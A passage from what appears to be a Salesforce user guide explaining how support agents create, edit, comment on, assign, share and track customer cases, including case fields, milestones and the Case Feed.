continue to have access to the Self-Service portal.

• You can create cases manually from the Cases tab, the Cases related list, or, depending on how your administrator has set
up your organization, in the feed on record detail pages.

• If you have an answers community, you can escalate an unanswered or problematic question into a new case.

You may have to verify that contacts are eligible to receive customer support, or that a service contract includes an entitlement,
before you create or update cases. If so, see Verifying Entitlements on page 1803.

To create a new case for a support email or phone call:

1. Use Search to find the individual’s account and then locate the contact in the Contacts related list.

If the contact doesn’t exist, create a new contact for that account.

2. Click New in the Cases related list of the contact.

If your organization uses record types, you might be prompted to choose a Record Type when creating a case. Different
record types can have different fields and different picklist values.

3. Enter information for the case.

When you enter or select a contact for the Contact Name field, the Account Name field defaults to the account associated
with the contact when you save the case. However, you can change the account in the Account Name field during
subsequent updates.

4. To associate the case with an asset:
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a. Click the Asset lookup icon. Initially, the asset lookup lists all assets for the contact if one is selected. Enter search
criteria and click Go! to refine this list.

b. Select an asset from the assets listed to associate it with the case.
c. If you do not find a matching asset, click New to create a new asset from the lookup dialog and associate it with the

new case. The New button displays if your organization has enabled Quick Create and you have the “Create” permission
on assets.

d. To associate the new asset with a product, enter your product search criteria and click Go! or select a product from the
list of matches. Click Skip if you do not want to associate the asset with a product.

e. Enter the asset details and click Save.

5. If enabled by your administrator, you can associate the case with another case. Simply type the case number of the parent
in the Parent Case field. Alternatively, you can click the lookup icon to search for a case's case number.

When a case is associated with a parent case it signifies a relationship between cases, such as a grouping of similar cases
for easy tracking, or a division of one case into multiple cases for various users to resolve.

6. Depending on how your organization is set up, you may be able to:

• Deselect Visible in Self-Service Portal if you don’t want the case to be available in the Self-Service portal.
• Select Assign using active assignment rules to automatically assign the case using your organization's

active assignment rule. If Assign using active assignment rules is selected and no assignment rule criteria
is met, the case is assigned to the Default Case Owner. If you do not select the checkbox, you are assigned as the owner.

• Select Send notification email to contact to automatically send an email to the contact indicating that the
case was created.

7. If Spell Checker is enabled for your organization, click Check Spelling to spell-check the contents of the Description
field. Spell Checker does not support all the languages that Salesforce supports. For example, Spell Checker doesn’t support
Thai, Russian, and double-byte languages, such as Japanese, Korean, or Chinese.

8. Click Save to save the case, or click Save & New to save the case and create another. Alternatively, click Save & Close to
save and close the case immediately. This sets the Closed When Created field on the case, which indicates that the
case was closed during creation.

Note:  When you save a newly-created case with the assignment rule box checked, the record type of the case might
change, depending on what behavior your administrator specified for assignment rules.

If your organization uses divisions, the division of a new case is automatically set to the division of the related contact.

See Also:
Cloning Cases
Case Fields
Cases Home
Solving Cases

1664

Creating CasesTracking Customer Inquiries



Displaying and Editing Cases
Case assignment rules, case escalation rules, and the Self-Service portal are available in: Professional, Enterprise, Unlimited,
and Developer Editions.

User Permissions Needed

“Read” on casesTo view cases:

“Edit” on casesTo change cases:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

Displaying Cases

Once you have located a case on the cases home or list pages, click the case name to display the details. From an account,
contact, or solution detail page, you can also click the case number in the Cases related list. The Cases related list shows
all cases associated with that item. If hover details are enabled, hover over any lookup field on the detail page to view
key information about a record before clicking into that record’s detail page.

If the Service Cloud console is set up, you can find, view, and edit cases and their related records on one screen.

Cases that display a red arrow have been automatically escalated by an escalation rule. Cases that display a red comment
icon have a new comment that was added by a customer in the Self-Service portal.

Viewing Case Updates and Comments (Chatter)

Display a Chatter feed of updates, comments, and posts about the case.

Web Case Display

In Professional, Enterprise, Unlimited, and Developer Edition organizations, cases generated via Web-to-Case display
an additional section of information entitled Web-to-Case Information, which includes all data entered by your customer.

Editing Cases

To update a case, click Edit, and then change the fields you want to update. Note that if you update the Contact Name
field, the Account Name field does not automatically default to the account associated with the contact when you save
the case. However, you can change the Account Name field during subsequent updates. If the contact is a Self-Service
user, he or she can only view cases on the Self-Service portal that are associated with the account on their contact record.

Note:  When you change the account on a case, manual shares on the case are deleted if the target group of
users in the manual shares does not have Read access on the new account.

If enabled, you can select Send notification email to contact below the case detail to automatically notify
the contact that you have updated the case (an email is only sent if you have access to the contact); and you can select
Assign using active assignment rules to automatically reassign the case using an active case assignment rule.
If Assign using active assignment rules is selected and no assignment rule criteria is met, the case is assigned
to the Default Case Owner.
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When you have finished editing the case, click Save. You can also click Save & New to save the case and create another,
or click Save & Close to save and close the current case.

Use inline editing to edit fields directly on the detail page. If inline editing isn’t enabled, contact your administrator.

Replying to Email Cases

To reply and work with cases created via Email-to-Case or On-Demand Email-to-Case, use the Emails related list on
the case.

Working with Milestones and Entitlement Processes

To view any milestones (required steps in a support process) on the case or add the date in which you've completed a
milestone, use the Case Milestones related list.

If enabled by your administrator, use these fields to view and update the entitlement process (support process) that
includes all of the milestones you must complete to resolve the case:

DescriptionField

How far along a case is to reaching an entitlement process's
milestones. You can click or hover your mouse pointer over

Timeline

each milestone to view its details. Milestones are
represented by these icons:
•

 Completed milestone
•

 Violated milestone

You can drag the Handle icon ( ) along the Timeline
Zoom tool to view past and future milestones.

When adding the Timeline field to case page layouts,
click the wrench icon ( ) next to it and select Show
label so the field name displays on cases.

The time the case entered an entitlement process. You can
update or reset the time if you have the “Edit” permission
on cases. When you reset the time:

Entitlement Process Start Time

• Closed or completed milestones aren't affected

• Incomplete milestones are recalculated based on the
new start time

The time the case exited an entitlement process.Entitlement Process End Time

Lets you stop an entitlement process on a case. This may
be necessary if you're waiting for a customer's response.

Stopped

Shows the date and time an entitlement process was stopped
on a case.

Stopped Since
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See Entitlement Management Overview on page 2180.

Replying to Chatter Answers Cases

To reply to a case converted from a question on a Web community, type your response in the Chatter-like feed on the
case detail page, and click Answer Customer. Your response is tracked as a comment on the Case Comments related
list.

Case comments marked Public display as private messages from customer support in Chatter Answers; they don't
display to the entire community. For example, if a support agent adds a public case comment, it only displays to the
case's contact when he or she logs in to Chatter Answers to review private messages. Support agents can read all private
and public case comments. See Chatter Answers Overview on page 1791.

Closing Cases

To close a case, click Close Case, edit the case Status and other fields as needed, and click Save. If article submissions
are enabled and you want to capture information that helped you close the case, click Save and Create Article. When
the draft article you submit is published, it is automatically attached to the case and available in the knowledge base for
easy search and reference.

If enabled by your administrator, you can close a case by simply selecting Closed from the Status field on a case edit
page.

Sharing

In Professional, Enterprise, Unlimited, and Developer Edition organizations, share a case and its related information
with other users, groups, or roles by clicking Sharing.

Articles

If the Articles related list is available, click Find Articles to see a list of articles in the knowledge base that may help you
solve the case. You can use keywords to initiate another search or attach any relevant articles to the case. Once attached,
articles appear on the Articles related list. If you create a draft article while closing a case, the article appears on the
related list after the draft article is published.

To create a new article from within a case, click New.

Finding Solutions

If the Solutions related list is available, you can enter relevant keywords in the search box, select the category in which
to search (if your organization uses solution categories), and click Find Solution.

Alternatively, if the suggested solutions feature is available, click the View Suggested Solutions button to find relevant
solutions to help you solve the case. The solutions that are suggested for the case are found using a formula that
automatically scores the relevancy of each solution to the particular case via word frequency, case similarity, and related
solutions.

If multilingual solutions is enabled for your organization, search results return solutions in all languages that have matching
keywords. However, search results across all languages might not be reliable because terms searched from one language
to another are processed differently.

Case Related Lists

The lower portion of the display provides information related to the case, including activities, solutions, emails, history,
comments, contact roles, related cases, case milestones, case team members, entitlements, assets, and attachments.
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You can click individual items to display additional detail. Click more at the bottom of the page or View More below
a related list to display more items. Clicking the New button lets you directly add new items. For example, clicking New
Task lets you add a new task.

The related lists you see are determined by your personal customization, and by any customization your administrator
has made to page layouts or your permissions to view related data.

Note: Hover over the links at the top of a detail page to display the corresponding related list and its records.
If Chatter is enabled, hover links display below the feed. An interactive overlay allows you to quickly view and
manage the related list items. Click a hover link to jump to the content of the related list. If hover links are not
enabled, contact your Salesforce administrator.

Printing Cases

To open a printable display of the record details, in the top-right corner of the page, click Printable View.

See Also:
Case History
Case Comments Overview
Working with Case Emails
Assigning Cases
Using the Case Milestones Related List
Case Teams Overview

Case Comments Overview

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Case comments let you and your support reps add, edit, or delete public or private comments on a case. All comments display
in a case’s Case Comments related list.

Comments can remain private or be made publicly available to a case’s contact on the Customer Portal, Self-Service portal,
or Chatter Answers. You can also set up your portal or Web community to let customers comment on their cases. When a

portal user adds a comment, the case owner receives an email, and a comment icon ( ) remains on the case heading until the
case owner views it.

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

See Also:
Creating and Editing Case Comments
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Creating and Editing Case Comments

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on casesTo view case comments:

“Edit” or “Create” on casesTo add case comments and make case comments public:

“Modify All” on casesTo edit or delete case comments added by other users:

“Edit Case Comments”To edit, delete, or make public your existing case comments:

You can create or edit a case comment from:

• The Internal Comments field on a case edit page

• The Case Comments related list on a case detail page

See Also:
Cases Overview

Creating and Editing Case Comments on Case Detail Pages

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on casesTo view case comments:

“Edit” or “Create” on casesTo add case comments and make case comments public:

“Modify All” on casesTo edit or delete case comments added by other users:

“Edit Case Comments”To edit, delete, or make public your existing case comments:

1. Click New or Edit on the Case Comments related list.
2. Optionally, select Public to enable comment notifications to the contact on the case, and to let the contact view the

comment on the Customer Portal or Self-Service.
3. Type comments in Comment.
4. Click Save.

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.
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Note:  If you publish cases and case comments to external contacts via Salesforce to Salesforce, all public case comments
are automatically shared with a connection when you share a case. To stop sharing a comment, select Make Private.

Tip:  On the Case Comments related list:

• Click Del to delete an existing comment.
• Click Make Public or Make Private to change the public status of a comment on the Customer Portal or

Self-Service portal. Case comments marked Public display as private messages from customer support in Chatter
Answers; they don't display to the entire community. For example, if a support agent adds a public case comment,
it only displays to the case's contact when he or she logs in to Chatter Answers to review private messages. Support
agents can read all private and public case comments.

See Also:
Case Comments Overview
Creating and Editing Case Comments

Creating and Editing Case Comments on Case Edit Pages

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on casesTo view case comments:

“Edit” or “Create” on casesTo add case comments and make case comments public:

“Modify All” on casesTo edit or delete case comments added by other users:

“Edit Case Comments”To edit, delete, or make public your existing case comments:

1. Click New on the Cases tab to create a case, or select an existing case and click Edit.
2. Type your comments in Internal Comments.
3. Optionally, select Send Customer Notification to email the contact on the case of your new public comment.
4. Click Save.

An email is sent to the case owner whenever a case comment is created or updated.

Note: Send Customer Notification displays on case edit pages when:

• An administrator has enabled case comment notification to contacts on Support Settings or Self-Service Portal
settings pages

• The comment is marked Public
• There’s a contact on the case
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• The contact on the case has a valid email address

See Also:
Case Comments Overview
Creating and Editing Case Comments

Creating Case Notes

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on casesTo create case notes:

Case notes are only visible to other users in your organization and aren't included in the Case Comments related lists. You
can use them to share information about the case with other agents, or get help from others in your organization. Optionally,
you can add files and links. Note that files attached to case notes aren't included in the Attachments related list on the case
detail page.

To create a case note:

1. Click Write Case Note on the Case Feed page. Note: depending on how your administrator has set up Case Feed, this
action may have another name.

2. Enter the text for the case note. Optionally, you can use the @ sign to mention another user, or the # sign to add a topic
to the note.

3. Optionally, attach a file from your computer or from Salesforce, or attach a link.
4. Click Share.

After the note appears in the feed, other internal users can click Comment to add information to it, or click Like to receive
email notifications when additional comments are added.

See Also:
Accessing Case Feed
Logging a Call
Communicating with Customers via the Customer Portal and Chatter Answers
Sending an Email from the Case Feed Page
Case Feed Overview
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Case History
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on casesTo view cases:

The Case History related list of a case detail page tracks the changes to the case. Any time a user modifies any of the standard
or custom fields whose history is set to be tracked on the case, a new entry is added to the Case History related list. All entries
include the date, time, nature of the change, and who made the change. Modifications to the related lists on the case are not
tracked in the case history.

Note:  Changes to the Closed When Created field are only tracked when the field is updated via the Force.com
API.

In Professional, Enterprise, Unlimited, and Developer Edition organizations, for automated case changes that result from
Web-to-Case or case assignment or escalation rules, the user listed in the history is the Automated Case User chosen in
the Support Settings.

See Also:
Cases Overview

Case Fields
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

A case has the following fields, listed in alphabetical order. Depending on your page layout and field-level security settings,
some fields may not be visible or editable.

DescriptionField

Escalated case icon. Indicates that a case has automatically
been escalated via your organization’s active escalation rule.

The escalated case icon no longer displays after the case is
closed or does not meet escalation criteria.

Comment icon. Indicates that a Self-Service user has added
a comment to the case. The icon appears until the owner views
the case.
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DescriptionField

Name of the account associated with the contact assigned to
the case. Automatically filled in when you link the case to a

Account Name

contact and save the case. During subsequent updates, you
can enter a different account name, or select a different account
using the lookup icon.

The customer's product model.

To quickly find an asset in the lookup dialog box, select criteria
from the Filter by fields. Administrators can set lookup
filters to restrict filter values and results.

Asset

Using Asset on a case edit page will show only assets
associated with the contact on the case. To see a list of all
assets associated with the case, use Asset in inline editing
mode.

Indicates the hours at which escalation actions or milestones
in entitlement processes run on the case.

Business Hours

The default currency for all currency amount fields in the case.
Amounts display in the case currency, and are also converted

Case Currency

to the user’s personal currency. Available only for organizations
that use multiple currencies.

Division to which the case belongs. This value is automatically
inherited from the related contact, or is set to the default global
division if no contact is specified.

Available only in organizations that use divisions to segment
their data.

Case Division

Unique number automatically assigned to the case. Numbering
for cases starts at “1000.” (Read only)

Administrators can modify the format and numbering for this
field.

Case Number

Case numbers frequently increase sequentially, but sometimes
they may skip numbers in a sequence.

Assigned owner of case.Case Owner

Name of the field that determines the picklist values available
for the record. The record type may be associated with a

Case Record Type

support process. Available in Enterprise, Unlimited, and
Developer Editions.

Checkbox that shows if a case was closed by the user from the
Self-Service portal. This checkbox is automatically set and

Closed by Self-Service User

cannot be changed manually. Report on this field to see how
many cases have been closed by users via suggested solutions
on the Self-Service portal. (Read only)
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DescriptionField

Checkbox that shows if a case was closed during creation via
the Save and Close button. This checkbox is automatically

Closed When Created

set and cannot be changed manually. Report on this field to
see how many cases have been immediately saved and closed
upon creation by support reps. (Read only)

Email address of contact associated with the case.
Automatically filled in with the contact’s email address when
you link a contact to the case. (Read only)

Contact Email

Mobile phone number of contact associated with the case.
Automatically filled in with the contact’s mobile phone number
when you link a contact to the case. (Read only)

Contact Mobile

Name of contact to which the case is linked. You can enter
the contact name, or select the contact using the lookup icon.

Contact Name

Primary phone number of contact associated with the case.
Automatically filled in with the contact’s primary phone
number when you link a contact to the case. (Read only)

Contact Phone

User who created the case, including creation date and time.
(Read only)

Created By

Listing of custom links for cases as set up by your
administrator.

Custom Links

Automatically generated date and time that the case was
closed. (Read only)

Date/Time Closed

Automatically generated date and time that the case was
opened. (Read only)

Date/Time Opened

Field describing the issue. Up to 32KB of data are allowed in
this field. Only the first 255 characters display in reports.

Description

Name of the entitlement to which the case is linked. You can
enter the entitlement name, or select the entitlement using
the lookup icon.

To quickly find an entitlement in the lookup dialog box, select
criteria from the Filter by fields. Administrators can set
lookup filters to restrict filter values and results.

Entitlement Name

This field is only available if entitlements is enabled.

The time the case entered an entitlement process. You can
update or reset the time if you have the “Edit” permission on
cases. When you reset the time:

Entitlement Process Start Time

• Closed or completed milestones aren't affected

• Incomplete milestones are recalculated based on the new
start time
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DescriptionField

This field displays if an entitlement process applies to the case.

The time the case exited an entitlement process.

This field displays if an entitlement process applies to the case.

Entitlement Process End Time

Internal notes related to the case. Up to 4KB of data are
allowed in each comment. You can enter comments while

Internal Comments

editing a case. They are displayed in the Case Comments
related list. Comments marked “public” may be viewed on
your Self-Service portal and Customer Portal. (Editable or
hidden only)

The status of a milestone (step in a support process) on the
case.

This field displays if an entitlement process applies to the case.

Milestone Status

Represents a milestone's status on the case by displaying one
of the following icons:

Milestone Status Icon

•  Compliant
•  Open Violation
•  Closed Violation

This field displays if an entitlement process applies to the case.

User who last changed the case fields, including modification
date and time. This does not track changes made to any of
the related list items on the case. (Read only)

Modified By

Source of case, for example, Phone, Email, Web, or Chatter
Answers. Entry is selected from a picklist of available values,

Origin

which are set by an administrator. Each picklist value can have
up to 40 characters.

Case above one or more related cases in a case hierarchy. The
parent case must be an existing case in Salesforce. You can

Parent Case

enter the case number, or select the case number using the
lookup icon.

Urgency of case. Entry is selected from a picklist of available
values, which are set by an administrator. Each picklist value
can have up to 20 characters.

Priority

Name of the product to which the case is linked. You can
enter the product name, or select the product using the lookup
icon.

This field is only available if entitlements is enabled and
includes products.

Product
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DescriptionField

Question on the Questions or Answers tab that is associated
with the case. This lookup field is automatically populated

Question

when you create a case from a question or a question is
escalated to a case.

Reason the case was opened. Entry is selected from a picklist
of available values, which are set by an administrator.

Reason

Status of the case. Entry is selected from a picklist of available
values, which are set by an administrator.

Status

Lets you stop an entitlement process on a case. This may be
necessary if you're waiting for a customer's response. This field
displays if an entitlement process applies to the case.

You can stop an entitlement process on a case up to 300 times.

Stopped

Shows the date and time an entitlement process was stopped
on a case. This field displays if an entitlement process applies
to the case.

Stopped Since

Brief description of customer’s issue, for example, “Printing
Gives Error on Internet Explorer.”

Subject

How far along a case is to reaching an entitlement process's
milestones. You can click or hover your mouse pointer over

Timeline

each milestone to view its details. Milestones are represented
by these icons:
•

 Completed milestone
•

 Violated milestone

You can drag the Handle icon ( ) along the Timeline Zoom
tool to view past and future milestones.

This field displays if an entitlement process applies to the case.

Type of case, for example, Question, Problem. Entry is selected
from a picklist of available values, which are set by an
administrator.

Type

Checkbox that indicates whether the case is visible to users in
the Self-Service portal.

In the Web-to-Case setup, you must include this field if you
want web-generated cases to be visible in the Self-Service
portal.

Visible in Self-Service Portal
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DescriptionField

Company name supplied by the customer who submitted the
case via Web-to-Case, Email-to-Case, or On-Demand
Email-to-Case.

Web Company

Email address supplied by the customer who submitted the
case via Web-to-Case, Email-to-Case, or On-Demand
Email-to-Case.

Web Email

Customer’s name as supplied by the customer who submitted
the case via Web-to-Case, Email-to-Case, or On-Demand
Email-to-Case.

Web Name

Phone number supplied by the customer who submitted the
case via Web-to-Case, Email-to-Case, or On-Demand
Email-to-Case.

Web Phone

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

See Also:
Displaying and Editing Cases

How is the “Age” calculated in case reports?
The Age of an open case is the time that has elapsed from its creation to the present. The Age of a closed case is the elapsed
time from its creation to the time it was closed. Case reports display a drop-down list labeled “Units” that lets you choose to
view the Age in days, hours, or minutes.

See Also:
Case Fields
Web-to-Case FAQ
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Using the Case Milestones Related List
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on casesTo view case milestones:

“Edit” on casesTo edit case milestones:

The Case Milestones related list on a case detail page displays a list of milestones that automatically apply to the case due to
an entitlement process. Milestones are required steps in your support process. They're metrics that represent service levels to
provide to each of your customers. Examples of milestones include first response and resolution times on cases.

Note:

• No records to display appears in the related list if no milestones apply to the case.

• The related list contains fields that your company has chosen to display, based on its business processes. Depending
on your company's requirements, you may see some or all of the following fields.

Action

Lists the actions you can perform on the milestone. For example, if you have the “Edit” permission on cases, you can
click Edit to select the milestone completion date.

Note: Customer Portal users can't edit case milestones.

Milestone

The name of a set of steps in an entitlement process that applies to the case. Users with the “Manage Entitlements”
permission can click a milestone's name to view the entitlement process, case criteria, time triggers, and actions associated
with it.

The following table lists the types of actions associated with milestones:

DescriptionAction Type

The actions to take when a milestone successfully
completes.

 Success Actions

The actions to take when a milestone is near violation. Warning Actions

The actions to take when a milestone is violated. Violation Actions

Administrators can set up milestones to automate the following for each action type:

1678

Using the Case Milestones Related ListCases



ExampleDescriptionAutomation Type

Create a task for a support rep to call
a customer when a first response is
violated.

Assigns a task to a specific user. You
can specify the task's Subject,
Status, Priority, and Due Date.

Task

Notify case owners when their cases
are near violation of a first response.

Emails a specific template to a
designated recipient.

Email Alert

Update the case Priority field to
High when a first response is near
violation.

Changes the value of a selected field.
You can specify a value or create a
formula for the new value.

Field Update

Send data about parts or services to an
external system after a first response is
successful.

Sends a message to a designated
endpoint. You can also specify a
username and the data you want to
include in the message.

Outbound Message

Start Date

The date and time that the milestone tracking started.

Target Date

The date and time to complete the milestone.

Completion Date

The date and time the milestone was completed.

Target Response

Shows the time to complete the milestone. Automatically calculated to include any business hours on the case. Depending
on your company's business requirements, the time can appear in minutes, hours, or days.

Time Remaining

Shows the time that remains before a milestone violation. Automatically calculated to include any business hours on the
case. Depending on your company's business requirements, the time can appear in minutes, hours, or days.

Elapsed Time

Shows the time it took to complete a milestone. Automatically calculated to include any business hours on the case.
Elapsed Time is calculated only after the Completion Date field is populated. Depending on your company's business
requirements, the time can appear in minutes, hours, or days.

Violation

Icon ( ) that indicates a milestone violation.

Completed

Icon ( ) that indicates a milestone completion.
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Because they're part of a case's history, completed milestones remain on a case even if they're no longer applicable.

See Also:
Case Fields
Entitlement Management Overview

Searching for Cases
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on casesTo view cases:

1. Enter your search terms in the sidebar or header search box.
2. Click Search.
3. From the search results, click an item to open it or click Edit, if available.

You can also create a case list view to find cases that match specific criteria.

See Also:
Cases Overview

Cloning Cases
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” on casesTo clone cases:

The Clone button on a case quickly creates a new case using information from the existing case, for example, when you need
to log multiple issues for a customer on a support call.

1. Click Clone on an existing case.
2. Enter or change any information for the new case.
3. Check the box to assign the case automatically using your active assignment rule.
4. Click Save.
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Note:  If you have read-only access to a field, the value of that field is not carried over to the cloned record.

See Also:
Case Fields

Deleting Cases
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Delete” on casesTo delete cases:

To delete a case, click Del next to the case on the cases list page, or click Delete on the case detail page. The Del link and
Delete button do not display for users who do not have the “Delete” permission on cases.

When you delete a case, all related events and tasks, case comments, and attachments are also deleted. Associated contacts,
accounts, and solutions are not deleted with the case. The deleted case is moved to the Recycle Bin. If you undelete the case,
any related items are also restored.

Note:  If you delete an event, task, case comment, or attachment from a case—and then delete the case— the event,
task, case comment, or attachment cannot be restored via undelete.

See Also:
Cases Overview

Assigning Cases
The case assignment options vary according to which Salesforce Edition you have.

User Permissions Needed

“Read” on casesTo view cases:

“Edit” on casesTo take ownership of cases from queues:

You can assign cases to users or queues in a variety of ways.
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• Using an Assignment Rule for Web-to-Case, Email-to-Case, or On-Demand Email-to-Case

In Professional, Enterprise, Unlimited, and Developer Edition organizations, web- and email-generated cases are
automatically assigned to users or queues based on criteria in your active case assignment rule.

Cases that do not match the assignment rule criteria are automatically assigned to the Default Case Owner specified
in the Support Settings.

• Using an Assignment Rule when Creating or Editing a Case

In Professional, Enterprise, Unlimited, and Developer Edition organizations, when creating or editing a case, you can
check a box to assign the case automatically using your active case assignment rule. An email is automatically sent to the
new owner if your administrator specified an email template in the matching rule entry. If you want this checkbox to be
selected by default, your administrator can modify the appropriate page layout.

• Changing Ownership of Multiple Cases (administrators only)

From any case list page, an administrator, or a user with the “Manage Cases” permission, can manually assign one or more
cases to a single user or queue. See Changing Multiple Cases on page 1662.

• Taking Cases from a Queue

To take ownership of cases in a queue, go to the queue list view, check the box next to one or more cases, and click Accept.
See Changing Multiple Cases on page 1662.

Note:  The organization-wide sharing model for an object determines the access users have to that object's records
in queues:

Public Read/Write/Transfer

Users can view and take ownership of records from any queue.

Public Read/Write or Public Read Only

Users can view any queue but only take ownership of records from queues of which they are a member or,
depending on sharing settings, if they are higher in the role or territory hierarchy than a queue member.

Private

Users can only view and accept records from queues of which they are a member or, depending on sharing
settings, if they are higher in the role or territory hierarchy than a queue member.

Regardless of the sharing model, users must have the “Edit” permission to take ownership of records in queues
of which they are a member. Administrators, users with the “Modify All” object-level permission for Cases, and
users with the “Modify All Data” permission, can view and take records from any queue regardless of the sharing
model or their membership in the queue.

• Changing Ownership of One Case

To transfer a single case you own or have read/write privileges to, click Change next to the Case Owner field on the case
detail page, and specify a user, partner user, or queue. Make sure that the new owner has the “Read” permission on cases.
The Change link displays only on the detail page, not the edit page.

In Professional, Enterprise, Unlimited, and Developer Edition organizations, check the Send Notification Email
box to automatically send an email to the new case owner.

• Creating a Case Manually (default assignment)
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When you create a case from the Cases tab, you are automatically listed as the case owner, unless you check the box to
assign the case via your assignment rule.

See Also:
Displaying and Editing Cases
Changing Multiple Cases

Sharing Cases
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on casesTo view cases:

Your administrator defines the default sharing model for your entire organization. You can change this model to extend sharing
to more users than the default set by your administrator. However, you cannot change the sharing model to make it more
restrictive than the default.

To view and manage sharing details, click Sharing on the case detail page. The Sharing Detail page lists the users, groups,
roles, and territories that have sharing access to the case. On this page, you can do any of the following:

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views.To edit or delete any view you created, select it from the View drop-down list and click Edit.

• Click Add to grant access to the record for other users, groups, roles, or territories.

Note:  To share a case with another user, that user must have access to the account associated with the case and
the “Read” permission on cases.

• Click Expand List to view all users that have access to the record.

• For manual sharing rules that you created, click Edit or Del next to an item in the list to edit or delete the access level.

See Also:
Cases Overview
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CASE FEED

Case Feed Overview
Available in: Enterprise, Unlimited, and Developer Editions

Case Feed gives support agents a more streamlined way of creating, managing, and viewing cases. Case Feed includes publishers
and a Chatter feed. The publishers let agents create case notes, log calls, change the status of cases, and communicate with
customers. The feed displays important case events in chronological order, so it’s easy to see the progress of each case.

The following table provides more details about Case Feed features.

DescriptionFeature

The highlights panel provides important overview information about the case, including the customer
contact information, case name, case description, status, priority, and case owner. The highlights panel

Highlights Panel

is read-only. If you want to change the values of the fields that appear in it, you can do so from the case
details page.

Use the publisher to communicate with customers through email or portal comments, create internal
comments, and log calls. To use the publisher, select the type of publishing action to take, and then
complete the action in the publisher. From the publisher, you can:

Publisher

• Answer a customer — Communicate with customers via email or through a comment published to
the customer portal (if available).

◊ Email: Reply to the customer using email. Optionally, you can send the email to additional or
different recipients, or attach a file to the message.

◊ Portal: Reply to your customer directly on the portal. The customer contact also receives an email
message.

• Log a call — Create a post to track a phone conversation that you had with the customer. You can
mention another internal user in the post. See Commenting and Liking.

• Write an internal note — Use an internal note to provide additional commentary on the case that's
only visible to internal users. You can mention other internal users in the post and add a topic to it;
see Commenting and Liking. You can also attach a file or a link to an internal note.

• Change the status of the case — Escalate or close the case, mark it as new, or put it on hold. You
can add information about the status change , and other users can comment from the feed.

The feed provides a chronological, filterable list of interactions you and others have had with the case.
It includes case activities, call logs, internal comments, emails, status changes, workflow events, and
customer and agent posts to the customer portal. See the table below for details on feed items.

Use filters to help you find information more efficiently, especially when a case is complex and has
numerous posts. You can filter on call logs, customer answers, emails, and internal notes. Note that

Feed
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DescriptionFeature

when you filter on internal notes, the feed displays textual notes only; notes containing URLs or links
aren't displayed.

Finally, you can choose how to display feed items:

• “Sort by Post Date,” where each post appears in the order it was added to the case.

• “Sort by Most Recent Activity,” where each post and all additional comments appear in the order
the original post was added to the case.

The case detail page provides detailed information about the case (for example, case reason, case origin,
and product). It also displays related lists that let you do things like create case teams and create and

Case Detail Page

edit tasks. See Viewing and Editing Cases from the Case Detail Page in Case Feed and Case Feed and
Related Lists.

You can use “comment” and “like” for internal notes, call logs, closed cases, and case creation events.

Commenting on a feed post works the same as commenting on a post in Chatter. To add a comment,
click Comment to display the Comment dialog box. You can add a topic to internal notes by entering

Commenting and
Liking

# followed by the topic (for example, #LaptopIssue). You can mention another internal user by entering
@ followed by the person's name.

You can Like and Unlike posts in the feed the same as in Chatter. When you like a post, you are in
effect “following” it. Click Unlike to stop following it.

Depending on your Chatter configuration, when you Like or Comment, you receive an email each time
another user updates that post. You can unlike a post to stop receiving email notifications about it.

The Followers area displays other users who are following the case. To view a full list, click Show All.

You automatically follow cases you own. To follow a case created by a different user, click Follow.
To stop following, click Following .

Followers

This table provides additional information about the items displayed in the feed.

DescriptionFeed Item

You can view the text entered by the agent who logged the call, and the date and time the call was
logged. Call logs are visible to internal users only

You can comment on or like a call log.

Call Logs

You can view text entered by an agent, and the date and time the agent created the comment.

Each comment has a Remove from Portal  link, which you use to delete the comment from the
portal. This can be helpful if, for example, the post contains incorrect or incomplete information.

Customer Portal
Communications

When you remove a comment from the portal, it's still available in Salesforce, but its status changes
from “public” to “private.”

Email exchanges between your organization and the customer appear in the feed. The feed displays:Email
• The agent who created the message or the customer contact who sent the message.

• The date and time the message was sent.

1685

Case Feed OverviewTracking Customer Inquiries



DescriptionFeed Item

• The subject.

• Who the message was sent to. When a message has multiple contacts in the To list, a link appears
that lets you display additional recipients.

• The name of the first recipient, and a link for additional recipients, if the message has recipients
in the Cc or Bcc lists.

• A View Email link, which you click to view the entire email in the email details page.

• Reply and, optionally, Reply All links. Click these links to create and send a reply to the message.

• Icons that indicate if the message is inbound or outbound.

You can view the text entered by the agent, and the date and time the note was created. Case notes
are only visible to internal users. If a file or link was attached to the note, you can access it from the
feed.

You can comment on or like a case note.

Case Notes

The feed shows changes made to the status of the case, along with the names of the agents who made
the changes.

Status Changes

The feed shows new tasks and events related to the case, along with updates to existing ones. Click
View Task or View Event in the feed to see details about an activity.

Tasks and Events

Case actions that result from workflow events display in the feed.Workflow Events

See Also:
Case Feed and Related Lists
Viewing and Editing Cases from the Case Detail Page in Case Feed
Logging a Call
Creating Case Notes
Communicating with Customers via the Customer Portal and Chatter Answers
Sending an Email from the Case Feed Page
Replying to an Email from the Case Feed Page
Closing Cases in Case Feed
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Accessing Case Feed
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on casesTo access Case Feed

You can access Case Feed only if it’s enabled in your organization and you’ve been assigned to a profile or permission set that
includes it.

1. Click the Cases tab.
2. Click a case.

The case opens in Case Feed.

See Also:
Case Feed Overview

Using Feed Filters in Case Feed
